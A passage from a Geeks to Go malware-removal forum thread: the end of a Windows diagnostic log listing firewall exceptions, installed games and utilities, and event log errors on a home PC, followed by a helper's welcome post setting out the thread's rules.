"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe:*:Enabled:Spybot-S&D 2 Updater -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe:*:Enabled:Spybot-S&D 2 Background update service -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe:*:Enabled:Spybot-S&D 2 Tray Icon -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe:*:Enabled:Spybot-S&D 2 Scanner Service -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe:*:Enabled:Spybot-S&D 2 Updater -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe" = C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe:*:Enabled:Spybot-S&D 2 Background update service -- (Safer-Networking Ltd.)
"C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe" = C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe:*:Enabled:Logitech Harmony Remote Software 7 -- ()
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{10571643-CFBA-4D02-AE79-0A70BDEF7947}" = lport=54925 | protocol=17 | dir=in | name=brothernetwork scanner |
"{2C81B4AC-3A49-4638-AE7B-F7F9018D375C}" = lport=808 | protocol=6 | dir=in | svc=nettcpactivator | app=c:\windows\microsoft.net\framework64\v4.0.30319\smsvchost.exe |
"{91A2AE95-89AD-4020-B65F-4EE6911546DF}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |
"{B0CC8793-1018-485F-97C7-630CB4FA3698}" = lport=2869 | protocol=6 | dir=in | app=system |
"{D780D2D3-2C6E-4A4B-808C-291839ED713A}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{00E5E6B0-8741-4074-8D01-52DF0B3D196B}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock infinite\binaries\win32\benchmark.bat |
"{041637A5-ECAF-488A-9BB5-FC91BBD4EE27}" = protocol=6 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwn2main_amdxp.exe |
"{0564F125-3750-497C-97C6-35DC715EA993}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{07558160-E5F9-436A-8254-901428790587}" = protocol=6 | dir=in | app=d:\steamlibrary\steamapps\common\warface\live\nw.exe |
"{0B4F989E-A5AB-4AB6-88D3-BDBE1517A76C}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock infinite\binaries\win32\bioshockinfinite.exe |
"{1AE8C2E7-FDF6-417E-A773-E62C028F8C4B}" = protocol=17 | dir=in | app=d:\steamlibrary\steamapps\common\crusader kings ii\ck2game.exe |
"{299BB8DA-E526-432C-88AC-C0E91F2A8B31}" = protocol=6 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwn2main.exe |
"{2A63DFB2-92E7-45D9-81FC-31B9A7057674}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2015\avgnsa.exe |
"{2CDA92A7-0A5E-4C42-B77D-3284802C6266}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstra.exe |
"{31418FAE-3FA4-4832-8EE5-0873AC2BBA5A}" = protocol=6 | dir=in | app=d:\steamlibrary\steamapps\common\wargame airland battle\wargame2.exe |
"{332E96B8-FD79-41CC-815A-CA08242714FE}" = protocol=17 | dir=in | app=c:\program files (x86)\raptr\raptr_im.exe |
"{34A9F4A4-683A-4B71-AFA1-BA3A561D2F11}" = protocol=6 | dir=in | app=c:\program files (x86)\raptr\raptr_im.exe |
"{3A060239-87E1-4930-AE53-DCF0991B799A}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock infinite\binaries\win32\bioshockinfinite.exe |
"{48220CB9-DECB-4227-BDBE-96A32B57C7B0}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{4EE26568-538E-4781-ABAA-58B498AEE388}" = protocol=6 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwn2server.exe |
"{5434B7DF-3790-4D11-849D-204C25390936}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe |
"{54379D32-B9C5-4C79-8288-B385680AFF20}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2013\avgmfapx.exe |
"{5DE1D3D3-0645-473F-B97C-8C4A2D39139A}" = protocol=6 | dir=in | app=d:\steamlibrary\steamapps\common\fallout new vegas\falloutnvlauncher.exe |
"{6229A752-AEE9-4E2A-9716-0EF710088738}" = protocol=17 | dir=in | app=d:\steamlibrary\steamapps\common\skyrim\skyrimlauncher.exe |
"{641736C4-06D8-4C81-BD60-D9A4F94910DC}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstra.exe |
"{67289B64-FE58-4A03-A789-9E81EBCA62A9}" = protocol=6 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwupdate.exe |
"{70F7DD3F-D284-4603-9A61-860F1D28722A}" = protocol=17 | dir=in | app=c:\program files (x86)\raptr\raptr.exe |
"{737274BC-D480-4FE4-8949-2518878634E3}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2015\avgdiagex.exe |
"{7BDF1F26-D8FE-49A4-BB2D-B07AE6232071}" = protocol=17 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwupdate.exe |
"{8488A3AA-1CD2-4FE5-80CA-39494D439EFB}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{898473A0-C18B-4E4F-A919-8356387B6828}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2015\avgdiagex.exe |
"{8BD25CCF-7D72-402C-8B83-70B2DCBFA742}" = protocol=6 | dir=in | app=c:\program files (x86)\brother\brmfl07b\faxrx.exe |
"{8EB5D4D0-208B-48C2-BBE5-BFA8C703A6C0}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{8FFB35FD-A864-4DAE-813E-D29DA54B86E9}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2014\avgmfapx.exe |
"{98BF390A-C370-47D7-9D31-F4AC4D57F30F}" = protocol=6 | dir=in | app=c:\program files (x86)\avg\avg2015\avgmfapx.exe |
"{A266A4EC-5C68-46CB-AE08-A53DE7C92BD0}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2015\avgmfapx.exe |
"{A5F25EE5-4662-43A3-83F8-0F9A5458E7BE}" = protocol=17 | dir=in | app=c:\program files (x86)\brother\brmfl07b\faxrx.exe |
"{AC27599C-E8E1-43C8-B2DE-FA67C6F23746}" = protocol=17 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwn2main.exe |
"{B0A61D0E-6514-4835-B000-9A4D0CF2D4E6}" = protocol=6 | dir=in | app=d:\steamlibrary\steamapps\common\crusader kings ii\ck2game.exe |
"{B129345E-960F-4EB8-8E63-F4B0DD0C98B0}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{B9E5A192-E99E-4BBB-8F32-F27026514ACD}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe |
"{BF3D9543-CD7F-4420-A2BC-1D08EB33B723}" = protocol=17 | dir=in | app=d:\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe |
"{C35302F7-0F1C-4ED8-AB13-F999E2E89E74}" = dir=in | app=c:\program files (x86)\windows live\sync\windowslivesync.exe |
"{C94B7BBA-7528-4065-A327-32837718CFBA}" = dir=in | app=c:\program files (x86)\windows live\messenger\wlcsdk.exe |
"{CAF7A620-8B04-4681-91B7-B53BE0649A0D}" = protocol=17 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwn2main_amdxp.exe |
"{CBB73251-51CD-4F9C-9FD6-AB6A25ABC39D}" = protocol=17 | dir=in | app=d:\steamlibrary\steamapps\common\wargame airland battle\wargame2.exe |
"{D089F391-5DE4-48B3-925E-B5C7B027C095}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2013\avgmfapx.exe |
"{D749CDAC-6392-4F9D-9331-CEEBAE0A4461}" = protocol=6 | dir=in | app=d:\steamlibrary\steamapps\common\skyrim\skyrimlauncher.exe |
"{D99973A9-A424-4EE5-A21C-CF9225AD6244}" = protocol=17 | dir=in | app=d:\program files (x86)\atari\neverwinter nights 2\nwn2server.exe |
"{E09554BB-D7FC-4890-8E45-5E93B294749B}" = protocol=6 | dir=in | app=c:\program files (x86)\raptr\raptr.exe |
"{E6B9870A-F3A0-48AF-9B79-24A5B79741E2}" = protocol=17 | dir=in | app=d:\steamlibrary\steamapps\common\warface\live\nw.exe |
"{E76D3077-AE71-4D1A-9B06-31D814B8AEE4}" = protocol=6 | dir=in | app=d:\steamlibrary\steamapps\common\sid meier's civilization v\launcher.exe |
"{E9AF37FE-F00B-489D-A767-E6C3874B552E}" = protocol=17 | dir=in | app=c:\program files (x86)\avg\avg2015\avgnsa.exe |
"{EA3FE45B-1A00-4C54-B4C7-51E9287B4CF6}" = protocol=17 | dir=in | app=d:\steamlibrary\steamapps\common\fallout new vegas\falloutnvlauncher.exe |
"{F338CD54-D62B-4A69-84DB-E7276A9BC9E6}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\bioshock infinite\binaries\win32\benchmark.bat |
"{FEBDE4F8-1509-448A-AD50-B7E09C433AF3}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |
"TCP Query User{50024E85-A454-4EF0-8F02-3EC8AC9150DE}C:\games\world_of_tanks\wotlauncher.exe" = protocol=6 | dir=in | app=c:\games\world_of_tanks\wotlauncher.exe |
"TCP Query User{68D646EF-ADDD-4255-8B40-79F862FA7BDD}C:\games\world_of_tanks\worldoftanks.exe" = protocol=6 | dir=in | app=c:\games\world_of_tanks\worldoftanks.exe |
"TCP Query User{EBDCB5F6-D436-4896-8ADE-62A8B5CF4265}D:\matrix games\conflict of heroes awakening the bear\update.exe" = protocol=6 | dir=in | app=d:\matrix games\conflict of heroes awakening the bear\update.exe |
"UDP Query User{70D787FE-9AA8-4B72-82F1-FB0048876DFB}C:\games\world_of_tanks\wotlauncher.exe" = protocol=17 | dir=in | app=c:\games\world_of_tanks\wotlauncher.exe |
"UDP Query User{CAA04508-138B-4695-82BB-B8BF5BC8FEB6}C:\games\world_of_tanks\worldoftanks.exe" = protocol=17 | dir=in | app=c:\games\world_of_tanks\worldoftanks.exe |
"UDP Query User{E558DE3A-803F-4A93-B24A-96E2C9D6A8EF}D:\matrix games\conflict of heroes awakening the bear\update.exe" = protocol=17 | dir=in | app=d:\matrix games\conflict of heroes awakening the bear\update.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0A2E1907-D0DE-0D01-CA64-CB0AB0BFE539}" = AMD Wireless Display v3.0
"{1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1}" = Microsoft .NET Framework 4.5
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{21B133D6-5979-47F0-BE1C-F6A6B304693F}" = Visual Studio 2010 x64 Redistributables
"{23170F69-40C1-2702-0920-000001000000}" = 7-Zip 9.20 (x64 edition)
"{2EDC2FA3-1F34-34E5-9085-588C9EFD1CC6}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.60610
"{426E8080-E591-436B-9F7A-3C61D0AB742D}" = AVG 2015
"{4D56CA64-0FC2-4291-B6D1-044F9B2141F3}" = AVG 2015
"{503F672D-6C84-448A-8F8F-4BC35AC83441}" = AMD APP SDK Runtime
"{690285C2-2481-44FB-8402-162EA970A6DD}" = Logitech Gaming Software
"{764384C5-BCA9-307C-9AAC-FD443662686A}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.60610
"{7AB8C73F-03FE-48AE-990C-CCB8D6C4FAB8}" = Intel® Trusted Connect Service Client
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{858C1B33-C3D5-4377-B77B-1E2F338C7F66}" = Intel® Network Connections 17.2.154.0
"{8C775E70-A791-4DA8-BCC3-6AB7136F4484}" = Visual Studio 2012 x64 Redistributables
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{A2CB1ACB-94A2-32BA-A15E-7D80319F7589}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727
"{AC53FC8B-EE18-3F9C-9B59-60937D0B182C}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727
"{BD1BCEF8-5CD6-D8ED-7D36-31C2172076EA}" = AMD Media Foundation Decoders
"{C16CD4C0-48EE-0F40-C9FD-0778EAF73FBD}" = AMD Wireless Display v3.0
"{C2956908-53A3-88FC-B795-B16508296FC4}" = AMD Catalyst Install Manager
"{D386FE62-CD8D-C8E0-DCA7-ED5FCAB476A5}" = AMD Wireless Display v3.0
"{ED273D26-E354-1A5B-A0D0-CB5258D43BD2}" = AMD Wireless Display v3.0
"{F55458B0-DCA9-38C9-6C8D-829F22463A55}" = AMD Drag and Drop Transcoding
"{F7CD07B2-565B-D770-0388-9C16A8FA5B1D}" = AMD Accelerated Video Transcoding
"6af12c54-643b-4752-87d0-8335503010de_is1" = Nexus Mod Manager
"AVG" = AVG 2015
"Logitech Gaming Software" = Logitech Gaming Software 8.46
"McAfee Security Scan" = McAfee Security Scan Plus
"PROSetDX" = Intel® Network Connections 17.2.154.0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
"{07309579-6D30-4769-A5D2-A8B0DCBDD59A}_is1" = Corsair K90 Firmware Update Application
"{15134cb0-b767-4960-a911-f2d16ae54797}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727
"{151AE945-AA23-3834-D5C7-C60832B71B15}" = CCC Help Czech
"{17528CE4-C333-48FB-A9E4-D841E795CDCE}" = Renesas Electronics USB 3.0 Host Controller Driver
"{178832DE-9DE0-4C87-9F82-9315A9B03985}" = Windows Live Writer
"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer
"{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}" = Microsoft XNA Framework Redistributable 3.1
"{1BD07DF4-FB06-41BA-B896-B2DA59000C96}" = Windows Live Toolbar
"{1EAC1D02-C6AC-4FA6-9A44-96258C37C812NA}_is1" = World of Tanks
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
"{22154f09-719a-4619-bb71-5b3356999fbf}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer
"{25A3B953-1423-3F15-640E-B620DD0F419A}" = Catalyst Control Center - Branding
"{2A110E91-EC9B-4F1C-B32B-41A72B5142BA}" = Wot Numbers
"{2F73A7B2-E50E-39A6-9ABC-EF89E4C62E36}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.50727
"{3175E049-F9A9-4A3D-8F19-AC9FB04514D1}" = Windows Live Communications Platform
"{3D6AD258-61EA-35F5-812C-B7A02152996E}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.60610
"{44A6C11C-D744-6B2C-D5A1-E32CB1DB0088}" = AMD Catalyst Control Center
"{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
"{46E1B1F2-A279-4356-9B17-029F9CC72EAE}" = Brother MFL-Pro Suite MFC-7840W
"{474F25F5-BDC9-40E5-B1B6-F6BF23FC106F}" = Windows Live Essentials
"{4DC7C1AB-4389-B736-082D-1BFA6BC10293}" = CCC Help Greek
"{51307F85-BD05-1938-8440-E88FD13585CA}" = CCC Help Chinese Traditional
"{5396FBD8-8BD7-47F9-92AE-F62F13D5A11D}" = NETGEAR WG111v3 wireless USB 2.0 adapter
"{5565E164-9928-CEDD-5011-9EE073D797B9}" = CCC Help Japanese
"{5947D004-A315-F50D-D24F-4C9D5B8413A5}" = CCC Help Spanish
"{5AAF27C9-51C1-DEF1-230F-9F348E2DF885}" = CCC Help Russian
"{5BBF2F0E-8891-0E74-83D3-0DBDB750EDC6}" = CCC Help Norwegian
"{5C6F884D-680C-448B-B4C9-22296EE1B206}" = Logitech Harmony Remote Software 7
"{5C89D6B4-C8C4-08B9-4381-4E6C9BA3C094}" = CCC Help Italian
"{6412CECE-8172-4BE5-935B-6CECACD2CA87}" = Windows Live Mail
"{64A47A55-1E5E-82F1-26A6-8157D34739A4}" = CCC Help Chinese Standard
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel® Management Engine Components
"{755C6015-01B7-475D-448A-CE4D35E68F38}" = CCC Help Dutch
"{80F19EAA-44C4-47C2-AE87-1C7628E858D6}" = Logitech Harmony Remote Software 7
"{8471021C-F529-43DE-84DF-3612E10F58C4}" = Remote Control USB Driver
"{86CF0325-7921-55A6-16B2-254E77C40FE4}" = CCC Help French
"{877AB8B2-9D11-D640-7B11-730699E0C9A2}" = CCC Help Swedish
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{8A74E887-8F0F-4017-AF53-CBA42211AAA5}" = Microsoft Sync Framework Runtime Native v1.0 (x86)
"{8B313BF5-9BD5-42a3-94C1-A28AF3AA51CC}" = Intel® Rapid Storage Technology enterprise
"{8E5233E1-7495-44FB-8DEB-4BE906D59619}" = Junk Mail filter update
"{95140000-0070-0000-0000-0000000FF1CE}" = Microsoft Office 2010
"{95716cce-fc71-413f-8ad5-56c2892d4b3a}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610
"{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}" = Visual Studio 2012 x86 Redistributables
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A974568-D4D5-EED2-1976-132C28211A82}" = CCC Help Korean
"{9C838089-F10C-4960-BCC1-D1FAAC8E2BF7}" = WOT Statistics 2.5.0.8
"{9C9CEB9D-53FD-49A7-85D2-FE674F72F24E}" = Microsoft Search Enhancement Pack
"{9F479685-180E-4C05-9400-D59292A1B29C}" = Windows Live Movie Maker
"{A0ED9B46-5B37-616A-FDCC-3F713BC2972D}" = CCC Help German
"{A11D86BF-B950-759B-3DBF-1575B76BF974}" = CCC Help Polish
"{a1909659-0a08-4554-8af1-2175904903a1}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610
"{A3B58AC5-1306-4452-837A-E96F0DC80662}" = WOT Statistics 2.5.0.5
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{AA14530E-3EF6-92AB-B39F-DB96F852BBBC}" = CCC Help Portuguese
"{ABAD2544-D794-E1B1-2763-55A9BB811D5A}" = CCC Help Thai
"{AC76BA86-7AD7-FFFF-7B44-AB0000000001}" = Adobe Reader XI  MUI
"{B10914FD-8812-47A4-85A1-50FCDE7F1F33}" = Windows Live Sync
"{B3BE2947-BB03-6079-60DD-41B388BBC74A}" = Catalyst Control Center Graphics Previews Common
"{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1" = Spybot - Search & Destroy
"{B57EAFF2-D6EE-4C6C-9175-ED9F17BFC1BC}" = Windows Live Messenger
"{B89357B0-C12E-F21E-7E8D-CA13BFED19C7}" = CCC Help Hungarian
"{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}" = Microsoft Sync Framework Services Native v1.0 (x86)
"{BEE64C14-BEF1-4610-8A68-A16EAA47B882}" = Futuremark SystemInfo
"{C5BE5386-0A43-32DD-9F2B-934B8CCCAC41}" = Catalyst Control Center Localization All
"{C70E8FBB-10F3-1DFF-E35F-6D62264D7A80}" = CCC Help Finnish
"{E6158D07-2637-4ECF-B576-37C489669174}" = Windows Live Call
"{E7D4E834-93EB-351F-B8FB-82CDAE623003}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.60610
"{E87D1F6D-954D-4BB4-B49D-D394EB460A09}_is1" = Corsair K90 Gaming Keyboard Driver V1.0
"{EC43C902-EF4F-0BF6-FA5F-897D2E450858}" = CCC Help Turkish
"{EE39FFBD-544E-49E4-A999-6819828EAE91}" = Windows Live Photo Gallery
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F20C1251-1D0A-4944-B2AE-678581B33B19}" = Neverwinter Nights 2
"{F2AB797F-31A3-A376-736B-9E0533BAB530}" = CCC Help English
"{F3220B5E-9395-F557-8DB9-1E0F29D32026}" = CCC Help Danish
"{FDB30193-FDA0-3DAA-ACCA-A75EEFE53607}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.50727
"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX
"Battlelog Web Plugins" = Battlelog Web Plugins
"CMBN10_is1" = Combat Mission Battle for Normandy
"Conflict of Heroes Awakening the Bear1.10" = Conflict of Heroes Awakening the Bear
"Conflict of Heroes Ghost Divisions1.30" = Conflict of Heroes Ghost Divisions
"Google Chrome" = Google Chrome
"InstallShield_{17528CE4-C333-48FB-A9E4-D841E795CDCE}" = Renesas Electronics USB 3.0 Host Controller Driver
"InstallShield_{5396FBD8-8BD7-47F9-92AE-F62F13D5A11D}" = NETGEAR WG111v3 wireless USB 2.0 adapter
"Kingsoft Office" = Kingsoft Office 2013 (9.1.0.4246)
"Origin" = Origin
"PunkBusterSvc" = PunkBuster Services
"Raptr" = Raptr
"Steam App 203160" = Tomb Raider
"Steam App 203770" = Crusader Kings II
"Steam App 222750" = Wargame: AirLand Battle
"Steam App 22380" = Fallout: New Vegas
"Steam App 291480" = Warface
"Steam App 72850" = The Elder Scrolls V: Skyrim
"Steam App 8870" = BioShock Infinite
"Steam App 8930" = Sid Meier's Civilization V
"TeamSpeak 3 Client" = TeamSpeak 3 Client
"Uplay" = Uplay
"WinLiveSuite_Wave3" = Windows Live Essentials
 
========== HKEY_CURRENT_USER Uninstall List ==========
 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{7C82709E-75FE-4C3A-976A-8C97908DDD7B}_is1" = A Game of Thrones version 0.8
"GameMaker-Studio12" = GameMaker-Studio 1.2
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 9/20/2014 12:24:38 AM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 9/24/2014 11:30:51 AM | Computer Name = Joe-PC | Source = Application Hang | ID = 1002
Description = The program TESV.exe version 1.9.32.0 stopped interacting with Windows
 and was closed. To see if more information about the problem is available, check
 the problem history in the Action Center control panel.    Process ID: 2008    Start Time:
 01cfd80aef6d30e8    Termination Time: 104    Application Path: D:\SteamLibrary\SteamApps\common\Skyrim\TESV.exe

Report
 Id:  
 
Error - 9/26/2014 11:43:48 AM | Computer Name = Joe-PC | Source = Application Hang | ID = 1002
Description = The program et.exe version 9.1.0.4246 stopped interacting with Windows
 and was closed. To see if more information about the problem is available, check
 the problem history in the Action Center control panel.    Process ID: 1b6c    Start Time:
 01cfd9a08b390582    Termination Time: 3    Application Path: D:\Program Files (x86)\Kingsoft\Kingsoft
 Office\office6\et.exe    Report Id: d5930cd2-4593-11e4-96b0-d43d7ed7e3ef 
 
Error - 9/26/2014 11:45:08 AM | Computer Name = Joe-PC | Source = Application Hang | ID = 1002
Description = The program et.exe version 9.1.0.4246 stopped interacting with Windows
 and was closed. To see if more information about the problem is available, check
 the problem history in the Action Center control panel.    Process ID: 27a0    Start Time:
 01cfd9a0c2658463    Termination Time: 3    Application Path: D:\Program Files (x86)\Kingsoft\Kingsoft
 Office\office6\et.exe    Report Id: 15a84138-4594-11e4-96b0-d43d7ed7e3ef 
 
Error - 10/4/2014 12:10:27 PM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 10/6/2014 9:24:22 PM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 10/13/2014 8:19:48 PM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 10/19/2014 3:49:18 PM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 10/20/2014 6:21:06 AM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
Error - 10/21/2014 11:20:05 PM | Computer Name = Joe-PC | Source = WinMgmt | ID = 10
Description =
 
[ System Events ]
Error - 10/11/2014 7:35:49 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :20" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
Error - 10/11/2014 10:55:35 PM | Computer Name = Joe-PC | Source = Server | ID = 2505
Description = The server could not bind to the transport \Device\NetBT_Tcpip_{ED16AFC5-67AC-4989-ABC2-A5E4B3CC75B9}
 because another computer on the network has the same name.  The server could not
 start.
 
Error - 10/11/2014 10:55:35 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :20" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
Error - 10/11/2014 10:55:35 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :0" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
Error - 10/12/2014 1:44:18 PM | Computer Name = Joe-PC | Source = Server | ID = 2505
Description = The server could not bind to the transport \Device\NetBT_Tcpip_{ED16AFC5-67AC-4989-ABC2-A5E4B3CC75B9}
 because another computer on the network has the same name.  The server could not
 start.
 
Error - 10/12/2014 1:44:18 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :0" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
Error - 10/12/2014 1:44:18 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :20" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
Error - 10/12/2014 10:33:10 PM | Computer Name = Joe-PC | Source = Server | ID = 2505
Description = The server could not bind to the transport \Device\NetBT_Tcpip_{ED16AFC5-67AC-4989-ABC2-A5E4B3CC75B9}
 because another computer on the network has the same name.  The server could not
 start.
 
Error - 10/12/2014 10:33:10 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :0" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
Error - 10/12/2014 10:33:10 PM | Computer Name = Joe-PC | Source = NetBT | ID = 4321
Description = The name "JOE-PC         :20" could not be registered on the interface
 with IP address 192.168.1.11.  The computer with the IP address 192.168.1.10 did
not allow the name to be claimed by  this computer.
 
 
< End of report >


Edited by glasgow3219, 02 November 2014 - 05:16 PM.

  • 0

Advertisements


#2
pystryker

pystryker

    Trusted Helper

  • Malware Removal
  • 3,912 posts
Hello and welcome to Geeks to Go! My nickname is Pystryker :) , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you
  • If you are receiving help for this issue at another forum, please let me know so I can close this thread.
  • Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
  • Please do not attach your logs or put them inside code/quote tags. Do a Copy/Paste of the entire contents of the log file and submit it inside your post unless directed otherwise.
  • At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
